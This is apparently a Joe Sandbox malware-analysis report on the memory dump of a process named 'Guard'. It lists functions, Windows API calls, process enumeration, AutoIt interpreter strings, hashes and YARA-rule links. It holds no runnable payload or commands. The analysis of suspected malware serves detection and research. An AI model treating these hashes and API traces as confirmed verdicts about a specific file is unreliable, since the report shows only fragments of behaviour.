                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                                                                                                                    • Opcode ID: 85342866b9e31c899c1eba0615ab735539eab6f1c0e8100c99b3ecc02748691f
                                                                                                                                                                                                                    • Instruction ID: 3d3c883b92af39c83f745cf8e9391e86e9556d7b698d5acd9df875547006e05c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85342866b9e31c899c1eba0615ab735539eab6f1c0e8100c99b3ecc02748691f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05719F715097019EC316EF65EC819ABBBE8FF95340F40892EF445CB2A1EF709944CB5A
                                                                                                                                                                                                                    Function 00364D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1312 364d83-364dd1 1314 364dd3-364dd6 1312->1314 1315 364e31-364e33 1312->1315 1317 364e37 1314->1317 1318 364dd8-364ddf 1314->1318 1315->1314 1316 364e35 1315->1316 1319 364e1a-364e22 DefWindowProcW 1316->1319 1320 3a09c2-3a09f0 call 35c460 call 35c483 1317->1320 1321 364e3d-364e40 1317->1321 1322 364de5-364dea 1318->1322 1323 364ead-364eb5 PostQuitMessage 1318->1323 1330 364e28-364e2e 1319->1330 1359 3a09f5-3a09fc 1320->1359 1325 364e65-364e8c SetTimer RegisterWindowMessageW 1321->1325 1326 364e42-364e43 1321->1326 1327 364df0-364df2 1322->1327 1328 3a0a35-3a0a49 call 3b2cce 1322->1328 1324 364e61-364e63 1323->1324 1324->1330 1325->1324 1333 364e8e-364e99 CreatePopupMenu 1325->1333 1331 3a0965-3a0968 1326->1331 1332 364e49-364e5c KillTimer call 365ac3 call 3534e4 1326->1332 1334 364eb7-364ec1 call 365b29 1327->1334 1335 364df8-364dfd 1327->1335 1328->1324 1353 3a0a4f 1328->1353 1339 3a096a-3a096c 1331->1339 1340 3a099e-3a09bd MoveWindow 1331->1340 1332->1324 1333->1324 1346 364ec6 1334->1346 1342 3a0a1a-3a0a21 1335->1342 1343 364e03-364e08 1335->1343 1347 3a096e-3a0971 1339->1347 1348 3a098d-3a0999 SetFocus 1339->1348 1340->1324 1342->1319 1350 3a0a27-3a0a30 call 3a8854 1342->1350 1351 364e0e-364e14 1343->1351 1352 364e9b-364eab call 365bd7 1343->1352 1346->1324 1347->1351 1355 3a0977-3a0988 call 35c460 1347->1355 1348->1324 1350->1319 1351->1319 1351->1359 1352->1324 1353->1319 1355->1324 1359->1319 1360 3a0a02-3a0a15 call 365ac3 call 3659d3 1359->1360 1360->1319
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00364E22
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 00364E4C
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00364E6F
                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00364E7A
                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00364E8E
                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00364EAF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                                                    • Opcode ID: e2b481120f379e56be1f143e8daedc4c2225667207f0b102093a51c2fe33364d
                                                                                                                                                                                                                    • Instruction ID: 8d16bfc8d03d800fb68c7ad0160a6c15fc5f868ce587c4510c24d12079713f56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b481120f379e56be1f143e8daedc4c2225667207f0b102093a51c2fe33364d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2441A030A48205ABDB276F64DC4DBBE3AADF741300F00C239F901965E6CBB69CA1D765
                                                                                                                                                                                                                    Function 0035AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003707EC
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 003707F4
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003707FF
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0037080A
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00370812
                                                                                                                                                                                                                      • Part of subcall function 003707BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0037081A
                                                                                                                                                                                                                      • Part of subcall function 0036FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0035AC6B), ref: 0036FFA7
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0035AD08
                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0035AD85
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00392F56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                    • String ID: <wA$\tA$sA
                                                                                                                                                                                                                    • API String ID: 1986988660-1995584511
                                                                                                                                                                                                                    • Opcode ID: 598cc6d198d055fa14489600b9c8168dff90e7e777fdbda31c985bdf378bd85f
                                                                                                                                                                                                                    • Instruction ID: 9d67494c90a37c5dc27577cae4b37bb8a9c27c2c72e4cd6c6a41acc653478351
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 598cc6d198d055fa14489600b9c8168dff90e7e777fdbda31c985bdf378bd85f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1381AAB09482848ED386EF69ED846D57FF9EB48304710C67AE829CB2B2EB745444CF5D
                                                                                                                                                                                                                    Function 00370FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0037593C: __FF_MSGBANNER.LIBCMT ref: 00375953
                                                                                                                                                                                                                      • Part of subcall function 0037593C: __NMSG_WRITE.LIBCMT ref: 0037595A
                                                                                                                                                                                                                      • Part of subcall function 0037593C: RtlAllocateHeap.NTDLL(01880000,00000000,00000001,?,00000004,?,?,00371003,?), ref: 0037597F
                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0037101C
                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00371031
                                                                                                                                                                                                                      • Part of subcall function 003787CB: RaiseException.KERNEL32(?,?,?,0040CAF8,?,?,?,?,?,00371036,?,0040CAF8,?,00000001), ref: 00378820
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                                    • String ID: `=>$h=>
                                                                                                                                                                                                                    • API String ID: 3902256705-1915909867
                                                                                                                                                                                                                    • Opcode ID: 2f76ce61b4a52b84dc69e912ff1642b9ef09452d7ee0d00fae4e223a4b16c963
                                                                                                                                                                                                                    • Instruction ID: c8f585341fd19f1f2a55797c5c3cf2c494a73e7ac10db6486bb119f779bcbe85
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f76ce61b4a52b84dc69e912ff1642b9ef09452d7ee0d00fae4e223a4b16c963
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAF0F43554425DE2CB37BB98DC09AEE77AC9F01310F108166F90CAA1C1DFB89B80C2A0
                                                                                                                                                                                                                    Function 003B4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 003B416D
                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 003B417B
                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 003B419B
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003B4245
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                    • Opcode ID: b37c8928045edceddf32ba9820c8e8b14cae8105b4418a61209761e759d321a1
                                                                                                                                                                                                                    • Instruction ID: f1f5ed7fdf7cd07feff5e274f84dc8ce2728d48766f5e84dadea0ccbaacc49b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b37c8928045edceddf32ba9820c8e8b14cae8105b4418a61209761e759d321a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31E5711083419FC316EF50D885AAFBBF8BF95304F04092DF685CA1A2EB709A49CB52
                                                                                                                                                                                                                    Function 0036278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003649C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003627AF,?,00000001), ref: 003649F4
                                                                                                                                                                                                                    • _free.LIBCMT ref: 0039FB04
                                                                                                                                                                                                                    • _free.LIBCMT ref: 0039FB4B
                                                                                                                                                                                                                      • Part of subcall function 003629BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00362ADF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Bad directive syntax error, xrefs: 0039FB33
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                                                                                    • String ID: Bad directive syntax error
                                                                                                                                                                                                                    • API String ID: 2861923089-2118420937
                                                                                                                                                                                                                    • Opcode ID: 2afa977af81224c4ba2ab41e01b1297475975f8cb09fcfce6df00a54e68aaf3f
                                                                                                                                                                                                                    • Instruction ID: 056ad08769d9ac14e05e8352610ff6cf99744b381a9d5922bcdb00688e5a1f2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2afa977af81224c4ba2ab41e01b1297475975f8cb09fcfce6df00a54e68aaf3f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5915C71910259AFCF16EFA4C8919EEB7B8FF05314F14852AF816EB2A1DB309945CB50
                                                                                                                                                                                                                    Function 003648B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                                                                    • String ID: AU3! ?>$EA06
                                                                                                                                                                                                                    • API String ID: 4104443479-2947962667
                                                                                                                                                                                                                    • Opcode ID: 087317121f9b352f8d4f7626286c026141f2f9576586c275afeb1b3ebc6bf636
                                                                                                                                                                                                                    • Instruction ID: 0eb64e268da5de75d3e389ca138629e56ce43269aa03a567ab152ddcfd9ef8f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 087317121f9b352f8d4f7626286c026141f2f9576586c275afeb1b3ebc6bf636
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14416B22E441585BDF279B64CC517BF7BE9CB46300F29C065E882EB28AD7248D8483E1
                                                                                                                                                                                                                    Function 003620E0 Relevance: 4.9, APIs: 3, Instructions: 422COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 61c0e2d333050f9c0e79600ee482dd36ae23450334f8a4fc28ea8a014a6edebb
                                                                                                                                                                                                                    • Instruction ID: aaba2b43ce28c219be48942f31e6e75a907a38d45921bd97cf7f414fb76b64e7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61c0e2d333050f9c0e79600ee482dd36ae23450334f8a4fc28ea8a014a6edebb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F1CE71A00519DBCF16DF94C890AFFB7B9FF48300F56C42AE812AB298DB349A51CB55
                                                                                                                                                                                                                    Function 003CE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _strcat.LIBCMT ref: 003CE20C
                                                                                                                                                                                                                      • Part of subcall function 00354D37: __itow.LIBCMT ref: 00354D62
                                                                                                                                                                                                                      • Part of subcall function 00354D37: __swprintf.LIBCMT ref: 00354DAC
                                                                                                                                                                                                                    • _wcscpy.LIBCMT ref: 003CE29B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1012013722-0
                                                                                                                                                                                                                    • Opcode ID: 3df8954fc95885fedd843d9f27462f74cd37e5b1d7d3e59f2da3657e3d985246
                                                                                                                                                                                                                    • Instruction ID: dc3be06e6fdce5f98f87f74cc8792e1ab89c9f4d53865bac87974e1f3ae16820
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3df8954fc95885fedd843d9f27462f74cd37e5b1d7d3e59f2da3657e3d985246
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5691F335A00604DFCB2ADF18C591EA9BBE5EF89314B55845DE81ACF6A2DB30FD45CB80
                                                                                                                                                                                                                    Function 003642F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00363E72,?,?,?,00000000), ref: 00364327
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00363E72,?,?,?,00000000), ref: 003A0717
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: b498ffb6fba5021ddaa8fe7646b1adb44373642d0e09dc0312c3def369378728
                                                                                                                                                                                                                    • Instruction ID: 4679ec59a79320a91ebb8427d3aa00d9377119563985f97ed85a116d540d3a0c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b498ffb6fba5021ddaa8fe7646b1adb44373642d0e09dc0312c3def369378728
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D019674144349BEF3261E24CC86F667A9CEB01768F24C315FAD45A1E0C6B15C558B14
                                                                                                                                                                                                                    Function 0035A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                                                                                                                                                                    • Instruction ID: c9f2ab215613cc14ac5b2cd326671c20e62c7cbc612a5d8b9e094937c6240c64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd206fe5fed281e2aa72b8400bf1bc280b9df585042923e9d98d36868cf6d82b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3661E070600A0ADFCB12DF50C881E7AB7E9EF05301F12826DED168B6A1D774ED88DB51
                                                                                                                                                                                                                    Function 0036410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 003641B2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                    • Opcode ID: cff3e63bfcba7db43269d5236b36e7ac38e6c0265936e555d6607330adb75b41
                                                                                                                                                                                                                    • Instruction ID: 5af0798a216122115b932e1b22d89e393b86473e665e547615fe68765a618378
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cff3e63bfcba7db43269d5236b36e7ac38e6c0265936e555d6607330adb75b41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D318C71A0061AAFCB19CF2CC8806ADB7B5FF59310F15C629E81997718D770BDA08B90
